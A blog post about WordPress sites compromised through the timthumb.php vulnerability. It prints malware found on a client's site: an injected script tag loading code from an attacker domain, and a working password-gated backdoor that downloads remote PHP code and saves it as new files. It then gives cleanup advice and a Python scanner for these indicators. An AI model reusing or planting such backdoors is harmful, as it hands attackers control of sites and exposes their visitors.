WordPress Sites Using Timthumb.php Are Prone to Hacking | How to Secure Your WordPress Blog | Security Issue in WordPress Blogs

Hey friends, today I am writing about WordPress hacking and how you can protect your WordPress blog from hackers. You all know that hacking a WordPress site is very easy if you don't follow all the security steps. Today one of my clients pinged me and told me that he was unable to log in to his wp-admin. His wp-admin was giving an error screen.


When I logged into the client's site via FTP, I saw that some files had been modified and some weird PHP files had been added. The first weird code was found in index.php at the root of the WordPress installation, which contained:


    <?php
    // Injected line: loads a script from the attacker's domain on every page view
    // and passes the visitor's referrer to it in the query string.
    echo '<script language="javascript" SRC="http://superpuperdomain.com/count.php?ref=' . urlencode($_SERVER['HTTP_REFERER']) . '"></script>';
    ?>

Then in the plugins folder there was a file called upd.php with the following code:

    <?php
    // Backdoor found in wp-content/plugins/upd.php: a password-gated downloader.
    $file = $_GET['file'];   // URL of the code the attacker wants fetched
    $pass = $_GET['pass'];   // password supplied by the attacker
    $true = '1c383cd30b7c298ab50293adfecb7b18';   // hard-coded expected password
    if ($pass == $true) {
        // Fetch the remote file with cURL (no header, 5 second timeout).
        $ch = curl_init($file);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_TIMEOUT, 5);
        $shell = curl_exec($ch);
        curl_close($ch);

        // Write the fetched content to a randomly named .php file next to this script,
        // which is why cleanup keeps finding new files with hash-like names.
        $tmp = md5(rand(0, 10000));
        $f = fopen($tmp . '.php', "w");
        fputs($f, $shell);
        fclose($f);
    }

Well, that's not all; many other files were infected too. The cause of this hack is remote code injection through a vulnerability in timthumb.php.


What is Timthumb.php?

Timthumb.php is one of the most popular scripts for auto-generating thumbnails, and it is used by almost all the popular premium WordPress theme clubs, so many sites are getting infected through this hack. The vulnerability in the timthumb.php script allows a hacker to upload arbitrary PHP code into the timthumb cache directory and execute it. Once the hacker executes this PHP file, he gets almost full control of your site and can do anything. In most cases you will see your site being redirected, or ads and popups will appear on it. In my client's case, wp-admin was inaccessible.


So what's the solution to this timthumb.php hack?

The very first thing you should do is scan your blog, or ask your hosting company to run a scan. Delete all unused themes and plugins. Update all plugins and themes to the latest version. If you are using a free, outdated theme, switch to a premium WordPress theme or to a free theme that receives constant updates. My recommendation is to grab the Thesis theme, which is well supported by the community and constantly updated. You can manually reinstall WordPress, update your theme and, most importantly, update the timthumb.php file. The author of this script has already released a fixed version, which you should download from the official source. Once done, recheck all files for any trace of hacked code. You can also use a WordPress security plugin to see whether any traces of the hacked files are left.

Even if you have not been hacked but are using an old version of a theme, I would suggest updating your theme to the latest version, or at least updating your timthumb.php. Always remember, prevention is better than cure.
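As an added example (not from the original post), here is a small Python scan that walks a WordPress install and flags the three indicators described above: the injected remote script tag in index.php, the password-gated downloader dropped into the plugins folder, and any .php file sitting inside a timthumb cache directory. The sample site it builds is constructed for the demonstration; the signature patterns and the assumption that timthumb's cache directory is named "cache" are mine.

```python
import os
import re
import tempfile

# Signatures modelled on the two infected files shown above (constructed for this
# example; a real cleanup must not rely on one fixed domain or one fixed string).
SIGNATURES = {
    "injected remote <script> tag": re.compile(
        r'<script[^>]*src="http://superpuperdomain\.com/count\.php', re.I),
    "password-gated remote PHP downloader": re.compile(
        r"\$_GET\[.pass.\].*?curl_exec\(.*?fopen\(.*?\.php.", re.S),
}

def scan_site(root):
    """Walk a WordPress tree; return (relative path, reason) pairs needing a manual look."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            for reason, pattern in SIGNATURES.items():
                if pattern.search(text):
                    findings.append((rel, reason))
            # timthumb only writes resized images to its cache directory, so a .php
            # file there is never legitimate (assumes the default name "cache").
            if os.path.basename(dirpath) == "cache":
                findings.append((rel, "PHP file inside a timthumb cache directory"))
    return sorted(findings)

def build_sample_site():
    """Constructed sample install reproducing the infection described in the post."""
    root = tempfile.mkdtemp()
    files = {
        "index.php": "<?php echo '<script language=\"javascript\" SRC=\"http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']).'\"></script>'; ?>",
        "wp-content/plugins/upd.php": "<?php $pass = $_GET['pass']; if ($pass == $true) { $shell = curl_exec($ch); $f = fopen($tmp.'.php', 'w'); }",
        "wp-content/themes/demo/cache/3f2a.php": "<?php // dropped by the attacker ?>",
        "wp-content/themes/demo/cache/thumb.jpg": "not php, must not be flagged",
        "wp-content/themes/demo/timthumb.php": "<?php // the legitimate script, not flagged ?>",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

Run `scan_site("/path/to/wordpress")` against a copy of the site pulled down over FTP; every hit is a file to inspect by hand before reinstalling.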

